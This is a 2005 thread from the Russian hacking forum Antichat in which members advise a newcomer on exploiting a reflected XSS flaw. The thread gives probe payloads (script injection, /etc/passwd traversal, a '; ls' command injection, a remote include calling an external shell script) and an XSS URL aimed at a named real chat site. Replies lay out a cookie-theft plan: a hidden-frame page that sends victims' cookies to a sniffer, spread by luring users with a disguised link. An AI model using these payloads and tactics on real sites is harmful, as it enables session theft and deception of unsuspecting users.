ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
Перезагрузить страницу XSS в форуме. Вопросы..
   
Ответ
Страница 1 из 3 1 2 3 >
 
Опции темы Поиск в этой теме Опции просмотра

XSS в форуме. Вопросы..
  #1  
Старый 09.08.2005, 11:49
Аватар для k1b0rg
k1b0rg
Тут может быть ваша реклама.
Регистрация: 30.07.2005
Сообщений: 1,243
Провел на форуме:
4520553

Репутация: 1316


По умолчанию XSS в форуме. Вопросы..
Прошу объяснить мне такую вещь.
Есть форум, и там можно в url прописать
http://forum/last.php?do=<script>alert()</script>
и выскакивает alert. Прбовал ../../../etc/passwd
неработает, пробовал еще
http://forum/last.php?do=test; ls -al
тоже не работает. Вставлял ссылку на другой сайт
http://forum/last.php?do=http://site/shell.php?c=pwd
Страница не загружается и в строке состояния пишется done. Подскажите что можно еще делать, или мож я что-то не правильно сделал.
Последний раз редактировалось k1b0rg; 09.08.2005 в 11:58..
 
Ответить с цитированием

  #2  
Старый 09.08.2005, 12:02
Аватар для censored!
censored!
Green member - Level 3
Регистрация: 02.11.2004
Сообщений: 1,337
Провел на форуме:
2398258

Репутация: 648


По умолчанию
Пассивная XSS. Т.е. надо создать липовую фреймовую страничку и всех туда заманивать. В невидимом фрейме будет происходить отсылка кук вошедших к тебе на снифер.
Но надо проверять - что храниться в куках, дадут ли они что-нить тебе (смотря какой форум) и вообще - получиться или нет.

p.s.
Цитата:
правильней ;ls -la
Т.е. -al не правильно
__________________
+ (это не крестик, это плюсик!)
__________________
 
Ответить с цитированием

  #3  
Старый 09.08.2005, 12:29
Аватар для k1b0rg
k1b0rg
Тут может быть ваша реклама.
Регистрация: 30.07.2005
Сообщений: 1,243
Провел на форуме:
4520553

Репутация: 1316


По умолчанию
а есть где нить статьи по этому, а то я не особо понял.
 
Ответить с цитированием

  #4  
Старый 09.08.2005, 22:39
Аватар для m0nzt3r
m0nzt3r
ветеран
Регистрация: 22.06.2004
Сообщений: 2,128
Провел на форуме:
5355463

Репутация: 2258


По умолчанию
а чего понимать то...пассивная хсс , надо чтобы жертва набрала это в урл своего браузера а он(а) этого не будет делать, уверяю)) хотя если ты в СИ разбираешься...
__________________
Elite VPN from Green. Quality. Click and buy!!!

Моня тот еще зверюга,
Свиду тихий внутри - ****,
Без обид,реальный мэн,
Просто рифмы нет совсем.
С ним шутить *****то очень,
В ирце вместе с ним хохочем (c) m0Hze
 
Ответить с цитированием

  #5  
Старый 09.08.2005, 23:18
Аватар для WizART
WizART
Участник форума
Регистрация: 19.07.2005
Сообщений: 292
Провел на форуме:
208487

Репутация: 11
По умолчанию
Короче делай свою страницу и чтоб никто не видел, в отдельном фрейме юзай то что у тебя есть... а потом ставь ссылку на нее) говори, мол, супер-линк)
 
Ответить с цитированием

  #6  
Старый 10.08.2005, 12:42
Аватар для Zadoxlik
Zadoxlik
Постоянный
Регистрация: 28.02.2005
Сообщений: 853
Провел на форуме:
3369632

Репутация: 749


По умолчанию
Цитата:
Сообщение от censored!  
p.s.
правильней ;ls -la
Т.е. -al не правильно
В чем разница ? и так и так - верно
 
Ответить с цитированием

  #7  
Старый 10.08.2005, 17:26
Аватар для k1b0rg
k1b0rg
Тут может быть ваша реклама.
Регистрация: 30.07.2005
Сообщений: 1,243
Провел на форуме:
4520553

Репутация: 1316


По умолчанию
кароче дело геммороем попахивает с этой xss, так?
ну а СИ я плохо владею никогда не увлекался чесанием, хотя уверяют что это круто.
 
Ответить с цитированием

  #8  
Старый 10.08.2005, 18:10
Аватар для Zadoxlik
Zadoxlik
Постоянный
Регистрация: 28.02.2005
Сообщений: 853
Провел на форуме:
3369632

Репутация: 749


По умолчанию
Странный ты человек. Какой помощи ты хочешь коли и информации никакой нет ?

То что ты там сверху описал - это могет быть все что угодно.
 
Ответить с цитированием

  #9  
Старый 10.08.2005, 18:24
Аватар для k1b0rg
k1b0rg
Тут может быть ваша реклама.
Регистрация: 30.07.2005
Сообщений: 1,243
Провел на форуме:
4520553

Репутация: 1316


По умолчанию
http://chat.gala.net/?index.php?"><script>alert()</script>
допустим вот такая бодяга.
 
Ответить с цитированием

  #10  
Старый 10.08.2005, 18:55
Аватар для censored!
censored!
Green member - Level 3
Регистрация: 02.11.2004
Сообщений: 1,337
Провел на форуме:
2398258

Репутация: 648


По умолчанию
Цитата:
В чем разница ? и так и так - верно
точно. это параметры. от перестановки параметров выведенный листинг не поменяется. пасиб.

Цитата:
http://chat.gala.net/?index.php?"><script>alert()</script>
допустим вот такая бодяга.
здесь, по-моему, пассивная xss. php-including не пашет.

чего делаешь - сначала заходишь в чат и проверяешь:
а. что храниться в куках
б. можно ли без ввода пароля сменить настройки юзеру
потом проверяешь - сработает ли алерт если обращение будет идти с другого сайта
потом проверяешь если ты, например в этом алерте, передашь +, то вырежеться он или нет.
потом уже лепишь страничку (смотри мой пост выше) и приглашаешь посетить ее посетителям. А вот что у них будет происходить после посещения - зависит от тебя. Если в куках храниться пас - можешь куки передавать к себе на снифер и сохранять, можешь менять настройки (если это разрешено)
__________________
+ (это не крестик, это плюсик!)
__________________
 
Ответить с цитированием
Ответ
Страница 1 из 3 1 2 3 >



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ